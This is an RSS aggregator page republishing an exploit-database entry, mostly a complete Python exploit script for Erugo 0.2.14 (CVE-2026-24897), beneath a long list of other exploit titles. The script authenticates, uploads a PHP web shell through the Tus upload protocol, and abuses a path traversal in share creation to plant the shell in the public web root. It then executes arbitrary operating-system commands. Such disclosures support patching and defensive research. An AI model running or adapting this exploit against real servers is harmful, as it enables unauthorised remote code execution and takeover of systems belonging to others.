惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

T
Threat Research - Cisco Blogs
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
V
Vulnerabilities – Threatpost
GbyAI
GbyAI
P
Proofpoint News Feed
L
LINUX DO - 热门话题
P
Palo Alto Networks Blog
A
About on SuperTechFans
T
Tenable Blog
M
MIT News - Artificial intelligence
IT之家
IT之家
I
Intezer
D
DataBreaches.Net
爱范儿
爱范儿
T
Threatpost
C
CERT Recently Published Vulnerability Notes
云风的 BLOG
云风的 BLOG
博客园 - 三生石上(FineUI控件)
WordPress大学
WordPress大学
K
Kaspersky official blog
大猫的无限游戏
大猫的无限游戏
A
Arctic Wolf
Y
Y Combinator Blog
Cyberwarzone
Cyberwarzone
酷 壳 – CoolShell
酷 壳 – CoolShell
D
Darknet – Hacking Tools, Hacker News & Cyber Security
H
Help Net Security
Microsoft Security Blog
Microsoft Security Blog
Spread Privacy
Spread Privacy
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
AWS News Blog
AWS News Blog
博客园 - 聂微东
C
Check Point Blog
S
Securelist
有赞技术团队
有赞技术团队
雷峰网
雷峰网
aimingoo的专栏
aimingoo的专栏
Last Week in AI
Last Week in AI
Stack Overflow Blog
Stack Overflow Blog
MongoDB | Blog
MongoDB | Blog
D
Docker
G
GRAHAM CLULEY
T
The Exploit Database - CXSecurity.com
C
Cybersecurity and Infrastructure Security Agency CISA
T
Tailwind CSS Blog
L
Lohrmann on Cybersecurity
G
Google Developers Blog
C
Cyber Attacks, Cyber Crime and Cyber Security
L
LangChain Blog

CXSECURITY Database RSS Feed - CXSecurity.com

Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution Frigate NVR 0.16.3 Remote Code Execution Linux nf_tables 6.19.3 Local Privilege Escalation ThingsBoard IoT Platform 4.2.0 Server-Side Request Forgery (SSRF) Linux Kernel Local Privilege Escalation (CVE-2026-43284 / CVE-2026-43500 / CVE-2026-46300) SUSE Manager 4.3.15 Code Execution Apache HertzBeat 1.8.0 Remote Code Execution JuzaWeb CMS 3.4.2 Authenticated Remote Code Execution NiceGUI 3.6.1 Path Traversal - CXSecurity.com GUnet OpenEclass E-learning platform < 4.2 Remote Code Execution (RCE) Windows Snipping Tool NTLMv2 Hash Hijack telnetd 2.7 Buffer Overflow - CXSecurity.com Kukurigu LPE - Linux Kernel Privilege Escalation (CVE-2026-43284 / CVE-2026-43500) Event Booking Calendar-5.0 Cross-site scripting (reflected) Linux Kernel Local Privilege Escalation (CVE-2026-43284 / CVE-2026-43500) Ninja Forms Uploads Unauthenticated PHP File Upload Traccar GPS Tracking System 6.11.1 Cross-Site WebSocket Hijacking (CSWSH) Linux Kernel Local Privilege Escalation via Memory Handling and Access Control Weakness Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) Linux Kernel proc_readdir_de() 6.18-rc5 Local Privilege Escalation Insecure Permissions vulnerability in Nagios Network Analyzer v.2024R1.02-64 and before allows a local attacker to escalate privileges via the remove_source.sh component. Samsung ONE Integer Overflow in CircleConst Tensor Size Calculation solaredge-CSRF-OOB-Injection - CXSecurity.com Trojan-Spy.Win32.Small / Remote Command Execution OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Throttlestop Kernel Driver Kernel Out-of-Bounds Write Privilege Escalation Critical Remote Code Execution Vulnerability in Windows Internet Key Exchange (IKE) Service (CVE-2026-33824) WordPress Madara Local File Inclusion FortiWeb 8.0.2 Remote Code Execution Easy File Sharing Web Server v7.2 Buffer Overflow NetBT e-Fatura Privilege Escalation - CXSecurity.com Docker Desktop 4.44.3 Unauthenticated API Exposure MaNGOSWebV4 4.0.6 Reflected XSS - CXSecurity.com Grafana 11.6.0 SSRF - CXSecurity.com OctoPrint 1.11.2 File Upload - CXSecurity.com esm-dev 136 Path Traversal - CXSecurity.com Linux Kernel mseal Invariant Violation (Linux kernel 6.17-7.0 rc5) astrojs/vercel <= 10.0.0 - Unauthenticated x-astro-path Header Path Override Microsoft SQL Server Privilege Elevation Through FreeScout Unauthenticated RCE via ZWSP .htaccess Bypass Wavlink WL-WN579X3-C firewall.cgi UPNP Stack-based Buffer Overflow esiclivre 0.2.2 SQL Injection - CXSecurity.com Payara Server Cross Site Scripting esiclivre 0.2.2 SQL Injection - CXSecurity.com SiYuan <= v3.6.1 Note unauthenticated arbitrary file read (path traversal) Tenda AC21 V1.0 V16.03.08.16 - Stack Buffer Overflow in SetNetControlList WWBN AVideo <= 26.0 - Authenticated SQL Injection Windows RRAS Remote Code Execution Vulnerability (CVE-2026-26111) - SE-RCE Exploit Linux Kernel 5.8 < 5.15.25 - Local Privilege Escalation Exploit Discourse <= 2026.2.1 Authenticated Missing Authorization Kanboard <= 1.2.50 Authenticated SQL Injection Glances <= 4.5.2 OS Command Injection via Mustache Template Fields LB-LINK BL-WR9000 V2.4.9 - Stack-based Buffer Overflow in /goform/get_hidessid_cfg LB-LINK BL-WR9000 V2.4.9 - Unauthenticated / Post-Auth Stack-based Buffer Overflow zumba/json-serializer zumba/json-serializer < 3.2.3 RCE Wekan 8.31.0 - 8.33Meteor DDP notificationUsers Sensitive Data Leak Splunk Remote Command Execution via Improper Input Validation Microsoft Windows MSHTML Security Feature Bypass Vulnerability Qualcomm GPU Driver Memory Corruption Vulnerability in Android Devices Frappe Framework <14.99.0 and <15.84.0 Unauthenticated SQL Injection PyJWT < 2.12.0 crit header bypass / Insufficient crit validation PluckCMS 4.7.10 Unrestricted File Upload Python-Multipart <0.0.22 - Path Traversal / Arbitrary File Write (CVE-2026-24486) WeGIA <= 3.6.4 Unauthenticated Admin Authentication Bypass NocoDB <= 0.301.2 User Enumeration via Password Reset Endpoint Craft CMS 4.x & 5.x RCE via Blocklist Bypass pac4j-jwt < 4.5.9, < 5.7.9, < 6.3.3 JwtAuthenticator Authentication Bypass via JWE-wrapped PlainJWT AirPlay Dual‑Mode Discovery Scanner for Flipper Zero ESP32 WiFi Dev Board WeGIA <= 3.6.4 Remote Code Execution via OS Command Injection WordPress Backup Migration 1.3.7 Remote Command Execution WeGIA 3.5.0 SQL Injection - CXSecurity.com
Erugo 0.2.14 Remote Code Execution (RCE)
Abdul Moiz · 2026-05-05 · via CXSECURITY Database RSS Feed - CXSecurity.com

Erugo 0.2.14 Remote Code Execution (RCE)

# Exploit Title: Erugo <= 0.2.14 - Authenticated Remote Code Execution (RCE) # Date: 2026-02-02 # Exploit Author: Abdul Moiz # Vendor Homepage: https://github.com/ErugoOSS/Erugo # Software Link: https://hub.docker.com/layers/wardy784/erugo/0.2.14/images/sha256-d3da70b337212a6c774b7028256870274edc2ac40536fcc0f1706cbbc4ed4fbf # Version: <= 0.2.14 # Tested on: Linux (Docker) # CVE: CVE-2026-24897 import requests import json import sys import time import base64 import argparse import random import string import warnings from datetime import datetime, timedelta, timezone # Disable SSL & Deprecation Warnings for clean output from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) warnings.filterwarnings("ignore", category=DeprecationWarning) class ErugoExploit: def __init__(self, target, username, password): self.target = target.rstrip("/") self.username = username self.password = password self.session = requests.Session() # Standard Headers self.session.headers.update({ "User-Agent": "Mozilla/5.0 (Exploit-DB)", "Accept": "application/json", "Tus-Resumable": "1.0.0" }) # Generate a random 8-char filename to prevent collisions rand_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) self.shell_name = f"{rand_str}.php" self.shell_content = '<?php system($_GET["cmd"]); ?>' def get_csrf(self): """Initialize session cookies""" print("[*] Initializing session...") try: self.session.get(f"{self.target}/login", verify=False, timeout=10) except Exception as e: print(f"[-] Connection failed: {e}") sys.exit(1) def login(self): print(f"[*] Authenticating as {self.username}...") url = f"{self.target}/api/auth/login" data = {"email": self.username, "password": self.password} try: r = self.session.post(url, json=data, verify=False, timeout=10) if r.status_code == 200: token = r.json().get("data", {}).get("access_token") if token: self.session.headers.update({"Authorization": f"Bearer {token}"}) print("[+] Login Successful.") return True except Exception as e: pass print("[-] Login Failed. Check credentials.") sys.exit(1) def upload_payload(self): print(f"[*] Uploading {self.shell_name} via Tus Protocol...") # 1. Tus Creation (POST) post_url = f"{self.target}/files/" # Base64 Encode metadata filename_b64 = base64.b64encode(self.shell_name.encode()).decode() filetype_b64 = base64.b64encode(b"application/x-php").decode() headers = { "Upload-Length": str(len(self.shell_content)), "Upload-Metadata": f"filename {filename_b64},filetype {filetype_b64}" } try: r = self.session.post(post_url, headers=headers, verify=False, timeout=10) if r.status_code != 201: print(f"[-] Tus creation failed. Status: {r.status_code}") sys.exit(1) location = r.headers.get("Location") file_id = location.split("/")[-1] # 2. Tus Data Transfer (PATCH) patch_headers = { "Content-Type": "application/offset+octet-stream", "Upload-Offset": "0" } r = self.session.patch(location, headers=patch_headers, data=self.shell_content, verify=False, timeout=10) if r.status_code == 204: print(f"[+] Payload uploaded. ID: {file_id}") return file_id else: print(f"[-] Data upload failed. Status: {r.status_code}") sys.exit(1) except Exception as e: print(f"[-] Upload error: {e}") sys.exit(1) def trigger_path_traversal(self, file_id): print("[*] Creating malicious share...") url = f"{self.target}/api/uploads/create-share-from-uploads" # Fix Date Warning: Use timezone-aware UTC tomorrow = datetime.now(timezone.utc) + timedelta(days=1) expiry = tomorrow.strftime("%Y-%m-%dT%H:%M:%S.000Z") payload = { "upload_id": "exploit", "name": "exploit_share", "recipients": [], "uploadIds": [file_id], "filePaths": { # VULNERABILITY: Path Traversal file_id: f"../../../../../public/{self.shell_name}" }, "expiry_date": expiry, "password": "", "password_confirm": "" } try: r = self.session.post(url, json=payload, verify=False, timeout=10) if r.status_code not in [200, 201]: print(f"[-] Share creation failed. Status: {r.status_code}") print(f" Response: {r.text}") sys.exit(1) print("[+] Malicious share created.") except Exception as e: print(f"[-] Error creating share: {e}") sys.exit(1) def execute_command(self, cmd): shell_url = f"{self.target}/{self.shell_name}" print(f"[*] Executing command: '{cmd}' at {shell_url}") time.sleep(1) # Wait for filesystem sync try: r = self.session.get(shell_url, params={"cmd": cmd}, verify=False, timeout=10) if r.status_code == 200: print("\n" + "="*50) print(f"COMMAND OUTPUT:") print(r.text.strip()) print("="*50 + "\n") else: print(f"[-] Command failed. Status: {r.status_code}") except Exception as e: print(f"[-] Execution error: {e}") def main(): parser = argparse.ArgumentParser(description='Erugo <= 0.2.14 Authenticated RCE') parser.add_argument('-t', '--target', required=True, help='Target URL (e.g., http://localhost:9998)') parser.add_argument('-u', '--username', required=True, help='User email') parser.add_argument('-p', '--password', required=True, help='User password') parser.add_argument('-c', '--command', default='id', help='Command to execute (default: id)') args = parser.parse_args() exploit = ErugoExploit(args.target, args.username, args.password) exploit.get_csrf() exploit.login() fid = exploit.upload_payload() exploit.trigger_path_traversal(fid) exploit.execute_command(args.command) if __name__ == "__main__": main()



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。